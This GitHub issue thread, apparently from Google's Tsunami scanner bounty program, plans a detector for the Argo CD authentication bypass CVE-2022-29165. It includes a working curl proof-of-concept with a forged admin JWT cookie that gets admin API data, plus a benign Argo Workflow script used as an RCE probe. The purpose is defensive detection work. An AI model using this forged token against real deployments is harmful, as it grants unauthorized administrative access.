AI PRP: Request CVE-2022-29165 Argo CD Auth Bypass

[maoning]

Reference: https://github.com/advisories/GHSA-r642-gv9p-2wjj

Please read the rules of engagement first at https://github.com/google/tsunami-security-scanner-plugins/issues/409.

[JamesFoxxx]

I just saw your tweet, working on this issue is exiting for me :))

[maoning]

Hi @JamesFoxxx,

Thank you for picking up this request! Please make sure the following items are completed before the plugin implementation:

• [x] Conduct vulnerability research with a brief description of how the plugin would work
• [x] Submit the vulnerable configuration of the target application to google/security-testbeds.

[JamesFoxxx]

Hi, I read the source code of argo-cd and the fix commit of the CVE here and I'm happy that I managed to exploit this CVE.

I tried to find endpoints that an anonymous user can't access And the endpoints that don't need for further setup on argo-cd like install additional applications.

an anonymous user can't get the list of certificates, the request in this case is:

curl -i -s -k -X $'GET'  -H $'Host: argocdHOST'   -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ'  $'https://127.0.0.1:8081/api/v1/certificates'

and the response is:

HTTP/1.1 403 Forbidden
Content-Type: application/json
Date: Mon, 25 Mar 2024 03:24:05 GMT
Content-Length: 110
Connection: close

{"error":"permission denied: certificates, get, ","code":7,"message":"permission denied: certificates, get, "}

however, with the help of the CVE, we can send a request like the following:

curl -i -s -k -X $'GET'  -H $'Host: argocdHOST'   -b $'argocd.token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.TGGTTHuuGpEU8WgobXxkrBtW3NiR3dgw5LR-1DEW3BQ'  $'https://127.0.0.1:8081/api/v1/certificates'

note that the argocd.token is a forged token. I can confirm that the response is the same as an authenticated admin:

HTTP/1.1 200 OK
Content-Type: application/json
Grpc-Metadata-Content-Type: application/grpc
Date: Mon, 25 Mar 2024 03:34:04 GMT
Content-Length: 1421

{"metadata":{},"items":[{"serverName":"bitbucket.org","certType":"ssh","certSubType":"ssh-rsa","certData":null,"certInfo":"SHA256:zzXQOXSRBEiUtuE8AikJYKwbHaxvSc0ojez9YXaGp1A"},
.
.
.

[maoning]

@JamesFoxxx Thanks for submitting the testing configs to security-testbeds, they are really helpful for me to understand how Argo CD works as well.

What you proposed could work, but I think we can make this plugin more effective by detecting all exposed Argo services including but not limited to CVE-2022-29165 for max bounty.

Could you check if it is possible to submit a workflow like this to all versions of exposed Argo services:

apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  name: ''
  generateName: scripts-
spec:
  destination:
    name: ''
    namespace: ''
    server: ''
  source:
    path: ''
    repoURL: ''
    targetRevision: HEAD
  project: ''
  entrypoint: tsunami-rce
  templates:
    - name: tsunami-rce
      steps:
        - - name: generate
            template: gen-printf-bash
        - - name: print
            template: print-message
            arguments:
              parameters:
                - name: message
                  value: '{{steps.generate.outputs.result}}'
    - name: gen-printf-bash
      script:
        image: 'debian:9.4'
        command:
          - bash
        source: |
          printf %s%s%s TSUNAMI_PAYLOAD_START randomstring TSUNAMI_PAYLOAD_END // Generate from Tsunami payload generator

The plugin will over the following scenarios:

1. CVE-2022-29165: auth configured but can be bypassed
2. All other versions of Argo CD with no Auth

References:

• https://argo-workflows.readthedocs.io/en/latest/walk-through/scripts-and-results/ for running arbitrary scripts in Argo
• https://argo-workflows.readthedocs.io/en/latest/swagger/ list of APIs (It looks like that they only support json format instead of yaml?)

[JamesFoxxx]

@maoning the links and the payload that you are referring to is the argo workflows not argo cd. I can write a separate plugin for argo workflows, however, which is as much popular as argo cd. argo cd and argo workflows differences: https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-1837543 https://github.com/argoproj/argo-workflows/discussions/7435#discussioncomment-2177941

the good news is that I found out how to enable anonymous admin access for argo-cd.

[maoning]

Great, thanks for spotting the difference!

For argo workflow, we have an existing plugin: https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/exposedui/argoworkflow/src/main/java/com/google/tsunami/plugins/detectors/exposedui/argoworkflow/ExposedArgoworkflowDetector.java

If you see significant value for a separate Argo Workflow plugin, please post it in a separate plugin request, I will review it.

For the current request, if there's no easy way to trigger RCE, then let's move forward with your proposal + anonymous admin access case.

Please submit our participation form and you can start working on the development.